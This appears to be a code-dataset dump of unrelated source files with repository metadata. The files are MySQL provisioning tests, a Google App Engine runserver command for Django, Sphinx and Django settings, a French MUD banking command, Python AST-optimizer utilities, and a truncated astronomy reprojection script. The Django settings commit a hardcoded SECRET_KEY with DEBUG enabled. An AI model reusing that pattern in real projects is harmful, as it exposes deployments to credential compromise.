@istest
def checks_that_a_database_is_present(self):
with self.execute_mock() as execute:
execute.return_value = DATABASES
result = self.role.is_database_present('performance_schema')
self.assertTrue(result)
execute.assert_called_with('mysql -u root -E -e "SHOW DATABASES" mysql', stdout=False, sudo=True)
@istest
def checks_that_a_database_is_not_present(self):
with self.execute_mock() as execute:
execute.return_value = DATABASES
result = self.role.is_database_present('bad_bad_database')
self.assertFalse(result)
execute.assert_called_with('mysql -u root -E -e "SHOW DATABASES" mysql', stdout=False, sudo=True)
@istest
def checks_that_a_database_is_not_present_when_there_is_none(self):
with self.execute_mock() as execute:
execute.return_value = ''
result = self.role.is_database_present('performance_schema')
self.assertFalse(result)
execute.assert_called_with('mysql -u root -E -e "SHOW DATABASES" mysql', stdout=False, sudo=True)
@istest
def creates_a_database_if_it_doesnt_exist_yet(self):
with patch.object(self.role, 'is_database_present') as is_database_present, self.execute_mock() as execute:
is_database_present.return_value = False
result = self.role.ensure_database('my_data')
self.assertTrue(result)
execute.assert_called_with('mysql -u root -e "CREATE DATABASE my_data" mysql', sudo=True, stdout=False)
@istest
def doesnt_create_a_database_if_it_already_exists(self):
with patch.object(self.role, 'is_database_present') as is_database_present, self.execute_mock() as execute:
is_database_present.return_value = True
result = self.role.ensure_database('my_data')
self.assertFalse(result)
self.assertFalse(execute.called)
@istest
def grants_privilege_if_not_granted_yet(self):
with patch.object(self.role, 'has_grant') as has_grant, self.execute_mock() as execute:
has_grant.return_value = False
result = self.role.ensure_grant('ALL PRIVILEGES', on='foo', username='john', login_from='%', with_grant_option=False)
self.assertTrue(result)
execute.assert_called_with('''mysql -u root -e "GRANT ALL PRIVILEGES ON foo.* TO 'john'@'%'" mysql''', stdout=False, sudo=True)
@istest
def grants_privilege_if_not_granted_yet_for_table(self):
with patch.object(self.role, 'has_grant') as has_grant, self.execute_mock() as execute:
has_grant.return_value = False
result = self.role.ensure_grant('ALL PRIVILEGES', on='foo.bar', username='john', login_from='%', with_grant_option=False)
self.assertTrue(result)
execute.assert_called_with('''mysql -u root -e "GRANT ALL PRIVILEGES ON foo.bar TO 'john'@'%'" mysql''', stdout=False, sudo=True)
@istest
def grants_privilege_with_grant_option_if_not_granted_yet(self):
with patch.object(self.role, 'has_grant') as has_grant, self.execute_mock() as execute:
has_grant.return_value = False
result = self.role.ensure_grant('ALL PRIVILEGES', on='foo', username='john', login_from='%', with_grant_option=True)
self.assertTrue(result)
execute.assert_called_with('''mysql -u root -e "GRANT ALL PRIVILEGES ON foo.* TO 'john'@'%' WITH GRANT OPTION" mysql''', stdout=False, sudo=True)
@istest
def doesnt_grant_privilege_if_already_granted(self):
with patch.object(self.role, 'has_grant') as has_grant, self.execute_mock() as execute:
has_grant.return_value = True
result = self.role.ensure_grant('ALL PRIVILEGES', on='foo', username='john', login_from='%', with_grant_option=True)
self.assertFalse(result)
self.assertFalse(execute.called)
|
mit
| -8,831,662,025,980,692,000
| 41.702899
| 157
| 0.6075
| false
| 3.586732
| true
| false
| false
|
danpetrikin/djangoappengine_rdbms
|
management/commands/runserver.py
|
1
|
7269
|
from optparse import make_option
import logging
import sys
from django.db import connections
from ...boot import PROJECT_DIR
from ...db.backend.base import DatabaseWrapper
from django.core.management.base import BaseCommand
from django.core.management.commands.runserver import BaseRunserverCommand
from django.core.exceptions import ImproperlyConfigured
from google.appengine.tools import dev_appserver_main
from django.core.management import call_command
class Command(BaseRunserverCommand):
"""Overrides the default Django runserver command.
Instead of starting the default Django development server this command
fires up a copy of the full fledged App Engine dev_appserver that emulates
the live environment your application will be deployed to.
"""
option_list = BaseCommand.option_list + (
make_option('--debug', action='store_true', default=False,
help='Prints verbose debugging messages to the console while running.'),
make_option('--debug_imports', action='store_true', default=False,
help='Prints debugging messages related to importing modules, including \
search paths and errors.'),
make_option('-c', '--clear_datastore', action='store_true', default=False,
help='Clears the datastore data and history files before starting the web server.'),
make_option('--high_replication', action='store_true', default=False,
help='Use the high replication datastore consistency model.'),
make_option('--require_indexes', action='store_true', default=False,
help="""Disables automatic generation of entries in the index.yaml file. Instead, when
the application makes a query that requires that its index be defined in the
file and the index definition is not found, an exception will be raised,
similar to what would happen when running on App Engine."""),
make_option('--enable_sendmail', action='store_true', default=False,
help='Uses the local computer\'s Sendmail installation for sending email messages.'),
make_option('--datastore_path',
help="""The path to use for the local datastore data file. The server creates this file
if it does not exist."""),
make_option('--history_path',
help="""The path to use for the local datastore history file. The server uses the query
history file to generate entries for index.yaml."""),
make_option('--login_url',
help='The relative URL to use for the Users sign-in page. Default is /_ah/login.'),
make_option('--smtp_host',
help='The hostname of the SMTP server to use for sending email messages.'),
make_option('--smtp_port',
help='The port number of the SMTP server to use for sending email messages.'),
make_option('--smtp_user',
help='The username to use with the SMTP server for sending email messages.'),
make_option('--smtp_password',
help='The password to use with the SMTP server for sending email messages.'),
make_option('--use_sqlite', action='store_true', default=False,
help='Use the new, SQLite datastore stub.'),
)
help = 'Runs a copy of the App Engine development server.'
args = '[optional port number, or ipaddr:port]'
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``OptionParser`` which will be used to
parse the arguments to this command.
"""
# hack __main__ so --help in dev_appserver_main works OK.
sys.modules['__main__'] = dev_appserver_main
return super(Command, self).create_parser(prog_name, subcommand)
def run_from_argv(self, argv):
"""
Captures the program name, usually "manage.py"
"""
self.progname = argv[0]
super(Command, self).run_from_argv(argv)
def run(self, *args, **options):
"""
Starts the App Engine dev_appserver program for the Django project.
The appserver is run with default parameters. If you need to pass any special
parameters to the dev_appserver you will have to invoke it manually.
Unlike the normal devserver, this does not use the autoreloader, as the
App Engine dev_appserver needs to be run from the main thread.
"""
args = []
# Set bind ip/port if specified.
if self.addr:
args.extend(["--address", self.addr])
if self.port:
args.extend(["--port", self.port])
# If runserver is called using handle(), progname will not be set
if not hasattr(self, 'progname'):
self.progname = "manage.py"
# Add email settings
from django.conf import settings
if not options.get('smtp_host', None) and not options.get('enable_sendmail', None):
args.extend(['--smtp_host', settings.EMAIL_HOST,
'--smtp_port', str(settings.EMAIL_PORT),
'--smtp_user', settings.EMAIL_HOST_USER,
'--smtp_password', settings.EMAIL_HOST_PASSWORD])
# Pass the application specific datastore location to the server.
preset_options = {}
for name in connections:
connection = connections[name]
if isinstance(connection, DatabaseWrapper):
args.extend(["--mysql_user", connection.settings_dict.get("USER")])
args.extend(["--mysql_password", connection.settings_dict.get("PASSWORD")])
#args.extend(["--mysql_port", "root")
#args.extend(["--mysql_host", "root")
preset_options = connection.settings_dict.get('DEV_APPSERVER_OPTIONS', {})
break
# Process the rest of the options here
bool_options = ['debug', 'debug_imports', 'clear_datastore', 'require_indexes',
'high_replication', 'enable_sendmail', 'use_sqlite',]
for opt in bool_options:
if options[opt] != False:
args.append("--%s" % opt)
str_options = ['datastore_path', 'history_path', 'login_url', 'smtp_host', 'smtp_port',
'smtp_user', 'smtp_password',]
for opt in str_options:
if options.get(opt, None) != None:
args.extend(["--%s" % opt, options[opt]])
# Fill any non-overridden options with presets from settings
for opt, value in preset_options.items():
arg = "--%s" % opt
if arg not in args:
if value and opt in bool_options:
args.append(arg)
elif opt in str_options:
args.extend([arg, value])
# TODO: issue warning about bogus option key(s)?
# Reset logging level to INFO as dev_appserver will spew tons of debug logs
logging.getLogger().setLevel(logging.INFO)
logging.info(args)
logging.info(PROJECT_DIR)
# Append the current working directory to the arguments.
dev_appserver_main.main([self.progname] + args + [PROJECT_DIR])
|
bsd-3-clause
| 2,640,274,047,164,670,000
| 46.207792
| 99
| 0.616729
| false
| 4.58612
| false
| false
| false
|
rodrigob/downhill
|
docs/conf.py
|
1
|
1515
|
import os
import sys
import better
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
#'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.mathjax',
#'sphinx.ext.pngmath',
'sphinx.ext.viewcode',
'numpydoc',
]
autosummary_generate = True
autodoc_default_flags = ['members']
numpydoc_show_class_members = False
numpydoc_show_inherited_class_members = True
source_suffix = '.rst'
source_encoding = 'utf-8-sig'
master_doc = 'index'
project = u'Downhill'
copyright = u'2015, Leif Johnson'
version = '0.3'
release = '0.3.0pre'
exclude_patterns = ['_build']
templates_path = ['_templates']
pygments_style = 'tango'
html_theme = 'better'
html_theme_path = [better.better_theme_path]
html_theme_options = dict(
rightsidebar=False,
inlinecss='',
cssfiles=['_static/style-tweaks.css'],
showheader=True,
showrelbartop=True,
showrelbarbottom=True,
linktotheme=True,
sidebarwidth='15rem',
textcolor='#111',
headtextcolor='#333',
footertextcolor='#333',
ga_ua='',
ga_domain='',
)
html_short_title = 'Home'
html_static_path = ['_static']
def h(xs):
return ['{}.html'.format(x) for x in xs.split()]
html_sidebars = {
'index': h('gitwidgets globaltoc sourcelink searchbox'),
'**': h('gitwidgets localtoc sourcelink searchbox'),
}
intersphinx_mapping = {
'python': ('https://docs.python.org/3.4/', None),
'numpy': ('http://docs.scipy.org/doc/numpy/', None),
'scipy': ('http://docs.scipy.org/doc/scipy/reference/', None),
}
|
mit
| -1,181,340,417,915,678,700
| 23.435484
| 66
| 0.667327
| false
| 3.036072
| false
| false
| false
|
pmutale/www.mutale.nl
|
settings/core.py
|
1
|
1265
|
import os
gettext = lambda s: s
DATA_DIR = os.path.dirname(os.path.dirname(__file__))
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.17.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qs7s_mqq@1d6uz%rj@q((#p@a^%hzemhhjoh4nolyr^n5t3-k!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
ADMINS = [('Peter', 'webmaster@mutale.nl'), ('Peter', 'peter@mutale.nl')]
ROOT_URLCONF = 'mysite.urls'
WSGI_APPLICATION = 'mysite.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'nl'
TIME_ZONE = 'Europe/Amsterdam'
USE_I18N = True
USE_L10N = True
USE_TZ = True
|
unlicense
| 6,090,058,569,688,771,000
| 24.3
| 73
| 0.731225
| false
| 2.908046
| false
| false
| false
|
vlegoff/tsunami
|
src/primaires/commerce/commandes/questeur/deposer.py
|
1
|
4847
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le paramètre 'déposer' de la commande 'questeur'."""
from primaires.commerce.transaction import Transaction
from primaires.interpreteur.masque.parametre import Parametre
class PrmDeposer(Parametre):
"""Commande 'questeur déposer'.
"""
def __init__(self):
"""Constructeur du paramètre"""
Parametre.__init__(self, "déposer", "deposit")
self.schema = "<nombre> <nom_objet>"
self.aide_courte = "dépose de l'argent"
self.aide_longue = \
"Cette commande permet de déposer de l'argent dans les " \
"coffres d'un questeur. Vous devez vous trouvez dans la " \
"salle permettant l'opération et avoir l'argent désiré sur " \
"vous. Vous devez préciser d'abord le nombre de pièces " \
"à déposer et ensuite le nom de la pièce (|cmd|bronze|ff| " \
"par exemple). Notez que les questeurs se réservent un " \
"pourcentage plus ou moins important sur ce que vous leur " \
"confiez."
def ajouter(self):
"""Méthode appelée lors de l'ajout de la commande à l'interpréteur"""
nom_objet = self.noeud.get_masque("nom_objet")
nom_objet.proprietes["conteneurs"] = \
"(personnage.equipement.inventaire_simple.iter_objets_qtt()" \
", )"
nom_objet.proprietes["quantite"] = "True"
def interpreter(self, personnage, dic_masques):
"""Interprétation du paramètre"""
salle = personnage.salle
if not importeur.commerce.questeur_existe(salle):
personnage << "|err|Aucun questeur n'est présent là où " \
"vous vous trouvez.|ff|"
return
questeur = importeur.commerce.questeurs[salle]
somme = dic_masques["nombre"].nombre
objet = dic_masques["nom_objet"].objet
if not objet.est_de_type("argent"):
personnage << "|err|Ceci n'est pas de l'argent.|ff|"
return
prototype = objet
argent = Transaction.get_argent(personnage)
if prototype not in argent:
personnage << "|err|Vous ne possédez pas cela.|ff|" # improbable
return
if somme > argent[prototype]:
somme = argent[prototype]
if questeur.servant is None:
personnage << "|err|Personne n'est présent pour s'en charger.|ff|"
return
if prototype not in questeur.monnaies:
personnage << "|err|Vous ne pouvez déposer cette monnaie " \
"dans ce questeur.|ff|"
return
total = somme * prototype.m_valeur
if total < questeur.montant_min:
personnage << "|err|Vous ne pouvez déposer si peu.|ff|"
return
montant = questeur.deposer(personnage, prototype, somme)
if montant == 0:
personnage << "|err|Vous ne pouvez pas déposer cette somme.|ff|"
else:
personnage.envoyer("{{}} entrepose votre argent dans ses " \
"coffres et ajoute {} pièces de bronze sur votre " \
"compte.".format(montant), questeur.servant)
|
bsd-3-clause
| -7,925,732,464,028,695,000
| 43.183486
| 79
| 0.643065
| false
| 3.517896
| false
| false
| false
|
haypo/fatoptimizer
|
fatoptimizer/tools.py
|
1
|
20707
|
import ast
import collections
import marshal
import sys
FLOAT_TYPES = (int, float)
COMPLEX_TYPES = FLOAT_TYPES + (complex,)
STR_TYPES = (bytes, str)
# Primitive Python types (not containers)
PRIMITIVE_TYPES = (type(None), bool, int, float, complex, bytes, str)
# Iterable types
ITERABLE_TYPES = (str, bytes, tuple, frozenset, list, set, dict)
# Maximum length of a "short" AST dump, limit used by error_what() and default
# limit of compact_dump()
COMPACT_DUMP_MAXLEN = 100
# Marker used for "not set" value, different than None
UNSET = object()
class OptimizerError(Exception):
pass
class OptimizerStep:
pass
def compact_ascii(value, maxlen=30):
text = ascii(value)
if len(text) > maxlen:
text = text[:maxlen] + '(...)'
return text
def compact_dump(node, maxlen=COMPACT_DUMP_MAXLEN):
if isinstance(node, list):
return repr([compact_dump(node_item, maxlen) for node_item in node])
node_repr = ast.dump(node)
if len(node_repr) > maxlen:
node_repr = node_repr[:maxlen] + '(...)'
return node_repr
# FIXME: replace it with FindNodes, see unroll.py
def _iter_all_ast(node):
yield node
for field, value in ast.iter_fields(node):
if isinstance(value, list):
for item in value:
if isinstance(item, ast.AST):
for child in _iter_all_ast(item):
yield child
elif isinstance(value, ast.AST):
for child in _iter_all_ast(value):
yield child
def ast_contains(tree, obj_type):
if isinstance(tree, list):
return any(ast_contains(node, obj_type) for node in tree)
else:
return any(isinstance(node, obj_type) for node in _iter_all_ast(tree))
def copy_node(node):
new_node = type(node)()
for field, value in ast.iter_fields(node):
setattr(new_node, field, value)
for attr in node._attributes:
try:
value = getattr(node, attr)
except AttributeError:
pass
else:
setattr(new_node, attr, value)
return new_node
def get_constant_size(value):
return len(marshal.dumps(value))
def _is_constant(value):
if isinstance(value, (tuple, frozenset)):
return all(_is_constant(item) for item in value)
else:
return isinstance(value, PRIMITIVE_TYPES)
def _new_constant(node, value):
if isinstance(value, ast.AST):
# convenient shortcut: return the AST object unchanged
return value
# FIXME: test the config directly here?
if value is None:
new_node = ast.Constant(value=None)
elif isinstance(value, (bool, int, float, complex, str, bytes)):
new_node = ast.Constant(value=value)
elif isinstance(value, (tuple, frozenset)):
if not _is_constant(value):
raise TypeError("container items are not constant: %r" % (value,))
new_node = ast.Constant(value=value)
elif isinstance(value, list):
elts = [_new_constant(node, elt) for elt in value]
new_node = ast.List(elts=elts, ctx=ast.Load())
elif isinstance(value, dict):
keys = []
values = []
for key, value in value.items():
keys.append(_new_constant(node, key))
values.append(_new_constant(node, value))
new_node = ast.Dict(keys=keys, values=values, ctx=ast.Load())
elif isinstance(value, set):
elts = [_new_constant(node, elt) for elt in value]
new_node = ast.Set(elts=elts, ctx=ast.Load())
else:
raise TypeError("unknown type: %s" % type(value).__name__)
copy_lineno(node, new_node)
return new_node
# FIXME: use functools.singledispatch?
def _get_constant(node, *, types=None):
if isinstance(node, ast.Constant):
return node.value
if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
# FIXME: rely on constant folding for that!
value = get_constant(node.operand, types=types)
if value is UNSET:
return UNSET
return (-value)
return UNSET
def get_constant(node, *, types=None):
if types is not None:
value = _get_constant(node, types=types)
if not isinstance(value, types):
return UNSET
return value
else:
return _get_constant(node)
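# Minimal illustration (hypothetical snippet, not part of the module):
#   get_constant(ast.Constant(value=3))            -> 3
#   get_constant(ast.Name(id='x', ctx=ast.Load())) -> UNSET
#   get_constant(ast.Constant(value=3), types=str) -> UNSET (wrong type)
# Callers must compare the result against UNSET rather than None, since None
# is itself a perfectly valid constant value.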
def _get_node_list(seq, literal=False):
values = []
for value in seq:
# only get constant items, otherwise optimizations will not produce
# a constant
if literal:
value = _get_literal(value)
else:
value = get_constant(value)
if value is UNSET:
return UNSET
values.append(value)
return values
def _get_literal(node, constant_items=False):
use_literal = (not constant_items)
value = get_constant(node)
if value is not UNSET:
return value
if isinstance(node, ast.Tuple) and use_literal:
elts = _get_node_list(node.elts, literal=True)
if elts is UNSET:
return UNSET
return list(elts)
if isinstance(node, ast.List):
elts = _get_node_list(node.elts, literal=use_literal)
if elts is UNSET:
return UNSET
return list(elts)
if isinstance(node, ast.Set):
# elements must be hashable
elts = _get_node_list(node.elts)
if elts is UNSET:
return UNSET
return set(elts)
if isinstance(node, ast.Dict):
# FIXME: this code is slow, only do it when get_literal() is
# called with types==dict (or dict in types)
# keys must be hashable
keys = _get_node_list(node.keys)
if keys is UNSET:
return UNSET
values = _get_node_list(node.values, literal=use_literal)
if values is UNSET:
return UNSET
return dict(zip(keys, values))
return UNSET
def get_literal(node, *, constant_items=False, types=None):
if types is not None:
value = _get_literal(node, constant_items)
if not isinstance(value, types):
return UNSET
return value
else:
return _get_literal(node, constant_items)
def _set_lineno(node, lineno, col_offset):
if 'lineno' in node._attributes:
if not hasattr(node, 'lineno'):
node.lineno = lineno
if 'col_offset' in node._attributes:
if not hasattr(node, 'col_offset'):
node.col_offset = col_offset
for child in ast.iter_child_nodes(node):
_set_lineno(child, lineno, col_offset)
def copy_lineno(orig_node, new_node):
_set_lineno(new_node, orig_node.lineno, orig_node.col_offset)
def pretty_dump(node, annotate_fields=True, include_attributes=False,
lineno=False, indent=' '):
"""
Return a formatted dump of the tree in *node*. This is mainly useful for
debugging purposes. The returned string will show the names and the values
for fields. This makes the code impossible to evaluate, so if evaluation is
wanted *annotate_fields* must be set to False. Attributes such as line
numbers and column offsets are not dumped by default. If this is wanted,
*include_attributes* can be set to True.
Recipe written by Alex Leone, January 2010:
http://alexleone.blogspot.fr/2010/01/python-ast-pretty-printer.html
"""
def _format(node, level=0):
if isinstance(node, ast.AST):
fields = [(a, _format(b, level)) for a, b in ast.iter_fields(node)]
if include_attributes and node._attributes:
fields.extend([(a, _format(getattr(node, a), level))
for a in node._attributes])
if lineno and getattr(node, 'lineno', None):
fields.append(('lineno', str(node.lineno)))
return ''.join([
node.__class__.__name__,
'(',
', '.join(('%s=%s' % field for field in fields)
if annotate_fields else
(b for a, b in fields)),
')'])
elif isinstance(node, list):
lines = ['[']
lines.extend((indent * (level + 2) + _format(x, level + 2) + ','
for x in node))
if len(lines) > 1:
lines.append(indent * (level + 1) + ']')
else:
lines[-1] += ']'
return '\n'.join(lines)
return repr(node)
if isinstance(node, list):
nodes = [_format(item, 1) for item in node]
nodes = (',\n' + indent).join(nodes)
spaces = ' ' * (len(indent) - 1)
return '[%s%s]' % (spaces, nodes)
if not isinstance(node, ast.AST):
raise TypeError('expected AST, got %r' % node.__class__.__name__)
return _format(node)
class NodeVisitorMeta(type):
def __new__(mcls, name, bases, namespace):
self_class = super().__new__(mcls, name, bases, namespace)
steps = [cls for cls in self_class.__mro__
if OptimizerStep in cls.__bases__]
# AST object name (ex: 'Name') => list of visitors
self_class._fullvisitors = collections.defaultdict(list)
self_class._visitors = collections.defaultdict(list)
for step in steps:
for name in dir(step):
if name.startswith('fullvisit_'):
key = name[10:]
func = getattr(step, name)
self_class._fullvisitors[key].append(func)
elif name.startswith('visit_'):
key = name[6:]
func = getattr(step, name)
self_class._visitors[key].append(func)
for name in dir(self_class):
if name.startswith('fullvisit_'):
key = name[10:]
func = getattr(self_class, name)
visitors = self_class._fullvisitors[key]
if func not in visitors:
visitors.append(func)
elif name.startswith('visit_'):
key = name[6:]
func = getattr(self_class, name)
visitors = self_class._visitors[key]
if func not in visitors:
visitors.append(func)
return self_class
class BaseNodeVisitor(metaclass=NodeVisitorMeta):
def __init__(self, filename):
self.filename = filename
def error_what(self, node):
return compact_dump(node, COMPACT_DUMP_MAXLEN)
def error_where(self, node):
where = self.filename
if hasattr(node, 'lineno'):
where = '%s:%s' % (where, node.lineno)
return where
def _call_visitor_method(self, visitor, node):
"""Call visitor(node).
Wrap exceptions to add more context on error.
OptimizerError exceptions are not caught.
"""
try:
return visitor(self, node)
except (OptimizerError, RecursionError):
raise
except Exception as exc:
what = self.error_what(node)
where = self.error_where(node)
raise OptimizerError("error at %s on visiting %s: %s"
% (where, what, exc))
class NodeVisitor(BaseNodeVisitor, ast.NodeVisitor):
"""Node visitor.
Differences with ast.NodeVisitor:
- Compute the mapping AST node name => list of methods when the class
is instantiated
- Support 'full' visitors (method name prefixed with 'fullvisit_') which
skip the call to generic_visit() and so give full control
- If an exception is raised, it is wrapped into a new OptimizerError
which adds the location in the file (filename and line number)
of the AST node currently being processed.
"""
def visit(self, node):
key = node.__class__.__name__
# "full" visitor calling generic_visit() internally?
if key in self._fullvisitors:
visitors = self._fullvisitors[key]
for visitor in visitors:
self._call_visitor_method(visitor, node)
else:
# visit attributes
new_node = self.generic_visit(node)
assert new_node is not UNSET
if new_node is not None:
node = new_node
if key in self._visitors:
# visit the node
visitors = self._visitors[key]
for visitor in visitors:
self._call_visitor_method(visitor, node)
class NodeTransformer(BaseNodeVisitor):
"""Node visitor.
Differences with ast.NodeTransformer:
- Create a new tree if at least one attribute is modified, so the input
tree is left unchanged
- Inherit advantages of NodeVisitor compared to ast.NodeVisitor
Creating a new tree is needed to be able to specialize a function:
basically, return [original_tree, specialized_tree].
"""
def optimize_node_list(self, node_list):
return node_list
def _visit_attr(self, parent_node, attr_name, node):
return self.visit(node)
def generic_visit(self, node, ignore_fields=None):
fields = {}
modified = False
if ignore_fields:
if isinstance(ignore_fields, str):
ignore_fields = {ignore_fields}
else:
ignore_fields = set(ignore_fields)
for field, value in ast.iter_fields(node):
if ignore_fields is not None and field in ignore_fields:
fields[field] = value
continue
if isinstance(value, list):
values = value
new_values = []
all_ast = True
for value in values:
if isinstance(value, ast.AST):
new_value = self._visit_attr(node, field, value)
modified |= (new_value != value)
if isinstance(new_value, list):
new_values.extend(new_value)
else:
new_values.append(new_value)
else:
# arguments.kw_defaults contains AST nodes
# (ex: Constant) and non-AST nodes (ex: None)
all_ast = False
new_values.append(value)
if all_ast:
value = new_values
new_values = self.optimize_node_list(new_values)
modified |= (new_values is not value)
value = new_values
elif isinstance(value, ast.AST):
old_value = value
value = self._visit_attr(node, field, value)
modified |= (value != old_value)
# Create a dictionary of fields used if any field is modified
# to create a new AST node
fields[field] = value
if modified:
# create a new AST node with the new fields
new_node = type(node)()
if 'lineno' in node._attributes:
copy_lineno(node, new_node)
for field, value in fields.items():
setattr(new_node, field, value)
return new_node
return node
def visit(self, node):
key = node.__class__.__name__
# "full" visitor calling generic_visit() internally?
if key in self._fullvisitors:
visitors = self._fullvisitors[key]
for visitor in visitors:
new_node = self._call_visitor_method(visitor, node)
if new_node is not None:
assert new_node is not UNSET
if type(new_node) != type(node):
# AST node type changed
return new_node
else:
node = new_node
else:
new_node = self.generic_visit(node)
assert new_node is not UNSET
if new_node is not None:
node = new_node
if key in self._visitors:
visitors = self._visitors[key]
for visitor in visitors:
new_node = self._call_visitor_method(visitor, node)
if new_node is not None:
assert new_node is not UNSET
if type(new_node) != type(node):
# AST node type changed
return new_node
else:
node = new_node
return node
def visit_node_list(self, node_list):
assert isinstance(node_list, list)
new_node_list = []
for node in node_list:
new_node = self.visit(node)
assert new_node is not None and new_node is not UNSET
if isinstance(new_node, list):
new_node_list.extend(new_node)
else:
new_node_list.append(new_node)
return new_node_list
class RestrictToFunctionDefMixin:
# don't visit children of nodes having their own namespace
def fullvisit_DictComp(self, node):
return node
def fullvisit_ListComp(self, node):
return node
def fullvisit_SetComp(self, node):
return node
def fullvisit_GeneratorExp(self, node):
return node
def fullvisit_FunctionDef(self, node):
return node
def fullvisit_AsyncFunctionDef(self, node):
return node
def fullvisit_Lambda(self, node):
return node
def fullvisit_ClassDef(self, node):
return node
class FindStrVisitor(NodeVisitor, RestrictToFunctionDefMixin):
"""Find Str nodes.
Find all Str nodes to compute constants.
"""
def __init__(self, filename):
super().__init__(filename)
self.str_constants = set()
@classmethod
def from_node(cls, filename, node):
visitor = cls(filename)
visitor.visit(node)
return visitor
def visit_Str(self, node):
self.str_constants.add(node.s)
# FIXME: add optional RestrictToFunctionDefMixin, see UnrollStep, unroll.py
class FindNodes:
"""Find AST nodes."""
def __init__(self, ast_types, callback):
self.ast_types = ast_types
self.callback = callback
def visit(self, node):
if isinstance(node, self.ast_types):
res = self.callback(node)
if not res:
return False
return self.generic_visit(node)
def generic_visit(self, node):
for field, value in ast.iter_fields(node):
if isinstance(value, list):
for item in value:
if isinstance(item, ast.AST):
res = self.visit(item)
if not res:
return False
elif isinstance(value, ast.AST):
res = self.visit(value)
if not res:
return False
return True
class ReplaceVariable(NodeTransformer, RestrictToFunctionDefMixin):
def __init__(self, filename, name_mapping):
super().__init__(filename)
# Mapping (dict or whatever): old name => new name
self.name_mapping = name_mapping
def replace_func_def(self, node):
return self.generic_visit(node)
def visit_Name(self, node):
if node.id not in self.name_mapping:
return node
new_value = self.name_mapping[node.id]
return _new_constant(node, new_value)
def Call(**kw):
if sys.version_info >= (3, 5):
return ast.Call(**kw)
else:
return ast.Call(starargs=None, kwargs=None, **kw)
def get_starargs(callsite):
if not isinstance(callsite, ast.Call):
raise ValueError("ast.Call expected, got %s" % type(callsite))
if sys.version_info >= (3, 5):
for arg in callsite.args:
if isinstance(arg, ast.Starred):
return arg.value
return None
else:
return callsite.starargs
def get_keywords(callsite):
if not isinstance(callsite, ast.Call):
raise ValueError("ast.Call expected, got %s" % type(callsite))
keywords = callsite.keywords
if sys.version_info < (3, 5) and callsite.kwargs is not None:
keywords = keywords.copy()
keywords.append(ast.keyword(arg=None, value=callsite.kwargs))
return keywords
def get_varkeywords(callsite):
if not isinstance(callsite, ast.Call):
raise ValueError("ast.Call expected, got %s" % type(callsite))
if sys.version_info >= (3, 5):
for arg in callsite.keywords:
if arg.arg is None:
return arg.value
return None
else:
return callsite.kwargs
|
mit
| -3,791,908,399,633,060,400
| 31.456113
| 80
| 0.568455
| false
| 4.100396
| false
| false
| false
|
e-koch/VLA_Lband
|
17B-162/HI/analysis/convolve_and_match_aca.py
|
1
|
3926
|
'''
Reproject onto the ACA CO(2-1) mosaic.
Since we have different versions of the full mosaic, we're
only going to make two versions of the reprojected HI maps:
1) One to the ACA map without the highly asymmetric beam mosaics.
The HI map will not be convolved to a matching beam since they are already
quite similar. (But this can be checked later)
2) One to the full ACA map and convolved to its round beam of ~11 arcsec.
Also, these are just spatial reprojections, not spectral. So the CO
channel width won't matter.
'''
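# A quick sanity check of the "already quite similar" beam assumption could
# look like this (sketch only; the paths are the ones used further below):
#
#   from spectral_cube import SpectralCube
#   hi = SpectralCube.read(seventeenB_1kms_wGBT_HI_file_dict['Cube'])
#   aca = SpectralCube.read(targ_cube)
#   print(hi.beam, aca.beam)
#
# If the beams differ appreciably, set common_beam=True in reproject_cube,
# as is done for the full-mosaic round-beam case below.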
import os
from os.path import join as osjoin
from cube_analysis.reprojection import reproject_cube
from cube_analysis.run_pipe import run_pipeline
from paths import (seventeenB_HI_data_1kms_wGBT_path,
seventeenB_1kms_wGBT_HI_file_dict, aca_co21_data_path)
out_folder = seventeenB_HI_data_1kms_wGBT_path("aca_co21_match",
no_check=True)
if not os.path.exists(out_folder):
os.mkdir(out_folder)
run_noasymm = True
run_fullmos_round = True
if run_noasymm:
out_name = seventeenB_1kms_wGBT_HI_file_dict['Cube'].split("/")[-1].rstrip(".fits") + \
